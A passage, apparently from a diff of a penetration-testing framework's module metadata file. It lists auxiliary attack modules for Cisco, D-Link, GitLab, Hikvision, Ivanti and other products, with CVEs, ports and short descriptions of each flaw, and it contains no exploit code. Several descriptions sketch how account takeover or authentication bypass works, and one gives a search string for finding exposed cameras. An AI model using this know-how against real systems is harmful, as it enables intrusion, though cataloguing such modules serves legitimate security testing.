16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 
17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n\n NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even\n though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.", + "references": [ + "CVE-2023-20198", + "CVE-2023-20273", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z", + "URL-http://web.archive.org/web/20250214093736/https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/", + "URL-https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/", + "URL-https://blog.leakix.net/2023/10/cisco-root-privesc/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-03-27 16:51:16 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ios_xe_os_exec_cve_2023_20273", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + 
"crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cisco_ssm_onprem_account": { + "name": "Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419)", + "fullname": "auxiliary/admin/http/cisco_ssm_onprem_account", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-07-20", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Mohammed Adel" + ], + "description": "This module exploits an improper access control vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206. An unauthenticated remote attacker\n can change the password of any existing user, including administrative users.", + "references": [ + "CVE-2024-20419", + "URL-https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy#vp", + "URL-https://www.0xpolar.com/blog/CVE-2024-20419" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-09-23 14:16:26 +0000", + "path": "/modules/auxiliary/admin/http/cisco_ssm_onprem_account.rb", + "is_install_path": true, + "ref_name": "admin/http/cisco_ssm_onprem_account", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cnpilot_r_cmd_exec": { + "name": "Cambium cnPilot r200/r201 Command Execution as 'root'", + "fullname": "auxiliary/admin/http/cnpilot_r_cmd_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Karn Ganeshen " + ], + "description": 
"Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.", + "references": [ + "CVE-2017-5259", + "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/cnpilot_r_cmd_exec", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/cnpilot_r_fpt": { + "name": "Cambium cnPilot r200/r201 File Path Traversal", + "fullname": "auxiliary/admin/http/cnpilot_r_fpt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Karn Ganeshen " + ], + "description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. 
Affected\n versions - 4.3.3-R4 and prior.", + "references": [ + "CVE-2017-5261", + "URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb", + "is_install_path": true, + "ref_name": "admin/http/cnpilot_r_fpt", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/contentkeeper_fileaccess": { + "name": "ContentKeeper Web Appliance mimencode File Access", + "fullname": "auxiliary/admin/http/contentkeeper_fileaccess", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module abuses the 'mimencode' binary present within\n ContentKeeper Web filtering appliances to retrieve arbitrary\n files outside of the webroot.", + "references": [ + "OSVDB-54551", + "URL-http://www.aushack.com/200904-contentkeeper.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb", + "is_install_path": true, + "ref_name": "admin/http/contentkeeper_fileaccess", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dir_300_600_exec_noauth": { + "name": "D-Link DIR-600 / DIR-300 Unauthenticated Remote Command 
Execution", + "fullname": "auxiliary/admin/http/dlink_dir_300_600_exec_noauth", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-04", + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "This module exploits an OS Command Injection vulnerability in some D-Link\n Routers like the DIR-600 rev B and the DIR-300 rev B. The vulnerability exists in\n command.php, which is accessible without authentication. This module has been\n tested with the versions DIR-600 2.14b01 and below, DIR-300 rev B 2.13 and below.\n In order to get a remote shell the telnetd could be started without any\n authentication.", + "references": [ + "OSVDB-89861", + "EDB-24453", + "URL-https://eu.dlink.com/uk/en/products/dir-600-wireless-n-150-home-router", + "URL-http://www.s3cur1ty.de/home-network-horror-days", + "URL-http://www.s3cur1ty.de/m1adv2013-003" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dir_300_600_exec_noauth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dir_645_password_extractor": { + "name": "D-Link DIR 645 Password Extractor", + "fullname": "auxiliary/admin/http/dlink_dir_645_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Roberto Paleari ", + "Michael Messner " + ], + "description": "This module exploits an authentication bypass vulnerability in DIR 645 < v1.03.\n With this vulnerability you are able to extract the password for the remote\n management.", + "references": [ + 
"OSVDB-90733", + "BID-58231", + "PACKETSTORM-120591" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dir_645_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/dlink_dsl320b_password_extractor": { + "name": "D-Link DSL 320B Password Extractor", + "fullname": "auxiliary/admin/http/dlink_dsl320b_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Michael Messner " + ], + "description": "This module exploits an authentication bypass vulnerability in D-Link DSL 320B\n <=v1.23. 
This vulnerability allows to extract the credentials for the remote\n management interface.", + "references": [ + "EDB-25252", + "OSVDB-93013", + "URL-http://www.s3cur1ty.de/m1adv2013-018" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/dlink_dsl320b_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/foreman_openstack_satellite_priv_esc": { + "name": "Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment", + "fullname": "auxiliary/admin/http/foreman_openstack_satellite_priv_esc", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-06", + "type": "auxiliary", + "author": [ + "Ramon de C Valle " + ], + "description": "This module exploits a mass assignment vulnerability in the 'create'\n action of 'users' controller of Foreman and Red Hat OpenStack/Satellite\n (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator\n account. 
For this exploit to work, your account must have 'create_users'\n permission (e.g., Manager role).", + "references": [ + "BID-60835", + "CVE-2013-2113", + "CWE-915", + "OSVDB-94655", + "URL-https://bugzilla.redhat.com/show_bug.cgi?id=966804", + "URL-https://projects.theforeman.org/issues/2630" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb", + "is_install_path": true, + "ref_name": "admin/http/foreman_openstack_satellite_priv_esc", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/fortra_filecatalyst_workflow_sqli": { + "name": "Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)", + "fullname": "auxiliary/admin/http/fortra_filecatalyst_workflow_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-06-25", + "type": "auxiliary", + "author": [ + "Tenable", + "Michael Heinzl" + ], + "description": "This module exploits a SQL injection vulnerability in Fortra FileCatalyst Workflow <= v5.1.6 Build 135, by adding a new\n administrative user to the web interface of the application.", + "references": [ + "CVE-2024-5276", + "URL-https://www.tenable.com/security/research/tra-2024-25", + "URL-https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-16 14:12:41 +0000", + "path": 
"/modules/auxiliary/admin/http/fortra_filecatalyst_workflow_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/fortra_filecatalyst_workflow_sqli", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/gitlab_password_reset_account_takeover": { + "name": "GitLab Password Reset Account Takeover", + "fullname": "auxiliary/admin/http/gitlab_password_reset_account_takeover", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-01-11", + "type": "auxiliary", + "author": [ + "h00die", + "asterion04" + ], + "description": "This module exploits an account-take-over vulnerability that allows users\n to take control of a gitlab account without user interaction.\n\n The vulnerability lies in the password reset functionality. Its possible to provide 2 emails\n and the reset code will be sent to both. It is therefore possible to provide the e-mail\n address of the target account as well as that of one we control, and to reset the password.\n\n 2-factor authentication prevents this vulnerability from being exploitable. 
There is no\n discernable difference between a vulnerable and non-vulnerable server response.\n\n Vulnerable versions include:\n 16.1 < 16.1.6,\n 16.2 < 16.2.9,\n 16.3 < 16.3.7,\n 16.4 < 16.4.5,\n 16.5 < 16.5.6,\n 16.6 < 16.6.4,\n and 16.7 < 16.7.2.", + "references": [ + "CVE-2023-7028", + "URL-https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/", + "URL-https://github.com/duy-31/CVE-2023-7028" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-27 07:44:11 +0000", + "path": "/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb", + "is_install_path": true, + "ref_name": "admin/http/gitlab_password_reset_account_takeover", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/gitstack_rest": { + "name": "GitStack Unauthenticated REST API Requests", + "fullname": "auxiliary/admin/http/gitstack_rest", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-01-15", + "type": "auxiliary", + "author": [ + "Kacper Szurek", + "Jacob Robles" + ], + "description": "This modules exploits unauthenticated REST API requests in GitStack through v2.3.10.\n The module supports requests for listing users of the application and listing\n available repositories. Additionally, the module can create a user and add the user\n to the application's repositories. 
This module has been tested against GitStack v2.3.10.", + "references": [ + "CVE-2018-5955", + "EDB-43777", + "EDB-44044" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/gitstack_rest.rb", + "is_install_path": true, + "ref_name": "admin/http/gitstack_rest", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "CLEANUP", + "description": "Remove user from repositories and delete user" + }, + { + "name": "CREATE", + "description": "Create a user on the application" + }, + { + "name": "LIST", + "description": "List application users" + }, + { + "name": "LIST_REPOS", + "description": "List available repositories" + } + ] + }, + "auxiliary_admin/http/grafana_auth_bypass": { + "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth", + "fullname": "auxiliary/admin/http/grafana_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-08-14", + "type": "auxiliary", + "author": [ + "Rene Riedling", + "Sebastian Solnica" + ], + "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. 
\n This cookie can be used for bypass authentication for everyone knowing a valid username.", + "references": [ + "CVE-2018-15727", + "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/" + ], + "platform": "", + "arch": "", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": null, + "mod_time": "2022-09-29 01:28:56 +0000", + "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py", + "is_install_path": true, + "ref_name": "admin/http/grafana_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/hikvision_unauth_pwd_reset_cve_2017_7921": { + "name": "Hikvision IP Camera Unauthenticated Password Change Via Improper Authentication Logic", + "fullname": "auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-09-23", + "type": "auxiliary", + "author": [ + "Monte Crypto", + "h00die-gr3y " + ], + "description": "Many Hikvision IP cameras contain improper authentication logic which allows unauthenticated impersonation of any configured user account.\n The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it\n affects many white-labeled camera products sold under a variety of brand names.\n\n Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time\n of publishing (shodan search: '\"App-webs\" \"200 OK\"'). Some of these devices can never be patched due to to the\n vendor preventing users from upgrading the installed firmware on the affected device.\n\n This module utilizes the bug in the authentication logic to perform an unauthenticated password change of any user account on\n a vulnerable Hikvision IP Camera. 
This can then be utilized to gain full administrative access to the affected device.", + "references": [ + "CVE-2017-7921", + "PACKETSTORM-144097", + "URL-https://ipvm.com/reports/hik-exploit", + "URL-https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921", + "URL-https://seclists.org/fulldisclosure/2017/Sep/23" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb", + "is_install_path": true, + "ref_name": "admin/http/hikvision_unauth_pwd_reset_cve_2017_7921", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/hp_web_jetadmin_exec": { + "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution", + "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-04-27", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module abuses a command execution vulnerability within the\n web based management console of the Hewlett-Packard Web JetAdmin\n network printer tool v6.2 - v6.5. It is possible to execute commands\n as SYSTEM without authentication. 
The vulnerability also affects POSIX\n systems, however at this stage the module only works against Windows.\n This module does not apply to HP printers.", + "references": [ + "OSVDB-5798", + "BID-10224", + "EDB-294" + ], + "platform": "", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/hp_web_jetadmin_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/ibm_drm_download": { + "name": "IBM Data Risk Manager Arbitrary File Download", + "fullname": "auxiliary/admin/http/ibm_drm_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-21", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by\n an unauthenticated attacker to download arbitrary files off the system.\n The first is an unauthenticated bypass, followed by a path traversal.\n This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.\n A downloaded file is zipped, and this module also unzips it before storing it in the database.\n By default this module downloads Tomcat's application.properties files, which contains the\n database password, amongst other sensitive data.\n At the time of disclosure, this is was a 0 day, but IBM later patched it and released their advisory.\n Versions 2.0.2 to 2.0.4 are vulnerable, version 2.0.1 is not.", + "references": [ + "CVE-2020-4427", + "CVE-2020-4429", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md", + 
"URL-https://seclists.org/fulldisclosure/2020/Apr/33", + "URL-https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/auxiliary/admin/http/ibm_drm_download.rb", + "is_install_path": true, + "ref_name": "admin/http/ibm_drm_download", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [], + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/http/idsecure_auth_bypass": { + "name": "Control iD iDSecure Authentication Bypass (CVE-2023-6329)", + "fullname": "auxiliary/admin/http/idsecure_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2023-11-27", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Tenable" + ], + "description": "This module exploits an improper access control vulnerability (CVE-2023-6329) in Control iD iDSecure <= v4.7.43.0. 
It allows an\n unauthenticated remote attacker to compute valid credentials and to add a new administrative user to the web interface of the product.", + "references": [ + "CVE-2023-6329", + "URL-https://www.tenable.com/security/research/tra-2023-36" + ], + "platform": "", + "arch": "", + "rport": 30443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-19 21:17:16 +0000", + "path": "/modules/auxiliary/admin/http/idsecure_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/idsecure_auth_bypass", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/iis_auth_bypass": { + "name": "MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass", + "fullname": "auxiliary/admin/http/iis_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-02", + "type": "auxiliary", + "author": [ + "Soroush Dalili", + "sinn3r " + ], + "description": "This module bypasses basic authentication for Internet Information Services (IIS).\n By appending the NTFS stream name to the directory name in a request, it is\n possible to bypass authentication.", + "references": [ + "CVE-2010-2731", + "OSVDB-66160", + "MSB-MS10-065", + "URL-https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": 
"/modules/auxiliary/admin/http/iis_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/iis_auth_bypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/intersil_pass_reset": { + "name": "Intersil (Boa) HTTPd Basic Authentication Password Reset", + "fullname": "auxiliary/admin/http/intersil_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-09-10", + "type": "auxiliary", + "author": [ + "Luca \"ikki\" Carettoni ", + "Claudio \"paper\" Merloni ", + "Max Dietz " + ], + "description": "The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11\n allows basic authentication bypass when the user string is greater\n than 127 bytes long. The long string causes the password to be\n overwritten in memory, which enables the attacker to reset the\n password. In addition, the malicious attempt also may cause a\n denial-of-service condition.\n\n Please note that you must set the request URI to the directory that\n requires basic authentication in order to work properly.", + "references": [ + "CVE-2007-4915", + "BID-25676", + "PACKETSTORM-59347" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/intersil_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/intersil_pass_reset", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/iomega_storcenterpro_sessionid": { + "name": "Iomega StorCenter Pro NAS Web Authentication Bypass", + "fullname": "auxiliary/admin/http/iomega_storcenterpro_sessionid", + "aliases": [], + 
"rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,\n allowing for simple brute force attacks to bypass authentication and gain administrative\n access.", + "references": [ + "OSVDB-55586", + "CVE-2009-2367" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb", + "is_install_path": true, + "ref_name": "admin/http/iomega_storcenterpro_sessionid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/ivanti_vtm_admin": { + "name": "Ivanti Virtual Traffic Manager Authentication Bypass (CVE-2024-7593)", + "fullname": "auxiliary/admin/http/ivanti_vtm_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-08-05", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "ohnoisploited", + "mxalias" + ], + "description": "This module exploits an access control issue in Ivanti Virtual Traffic Manager (vTM), by adding a new\n administrative user to the web interface of the application.\n\n Affected versions include 22.7R1, 22.6R1, 22.5R1, 22.3R2, 22.3, 22.2.", + "references": [ + "PACKETSTORM-179906", + "CVE-2024-7593", + "URL-https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Virtual-Traffic-Manager-vTM-CVE-2024-7593?language=en_US" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-08-16 15:43:34 
